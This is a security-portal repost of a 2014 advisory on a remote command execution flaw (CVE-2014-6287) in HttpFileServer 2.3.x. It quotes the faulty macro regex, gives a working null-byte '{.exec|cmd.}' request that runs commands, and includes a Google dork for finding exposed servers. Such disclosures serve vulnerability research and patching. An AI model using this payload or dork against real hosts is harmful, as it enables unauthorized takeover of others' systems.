首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HttpFileServer 2.3.x Remote Command Execution Vulnerability
来源:danielelinguaglossa@gmail.com 作者:Daniele 发布时间:2014-09-15  
Affected software: http://sourceforge.net/projects/hfs/
Version : 2.3x
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 11-09-2014
# Remote: Yes
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
  
issue exists due to a poor regex in the file ParserLib.pas
  
  
function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
  
  
it will not handle null byte so a request to
  
http://localhost:80/search=%00{.exec|cmd.}
  
will stop regex from parse macro , and macro will be executed and remote code injection happen.

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Rooted SSH/SFTP Daemon Default
·ALCASAR <= 2.8.1 - Remote Root
·Railo 4.2.1 Remote File Inclus
·WordPress Slideshow Gallery 1.
·ManageEngine Eventlog Analyzer
·Phpwiki Ploticus Remote Code E
·SolarWinds Storage Manager Aut
·ZTE ZXDSL-931VII Unauthenticat
·Onlineon E-Ticaret Database Di
·seafile-server 3.1.5 Denial Of
·Joomla Spider Contacts 1.3.6 (
·Oracle MyOracle Filter Bypass
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved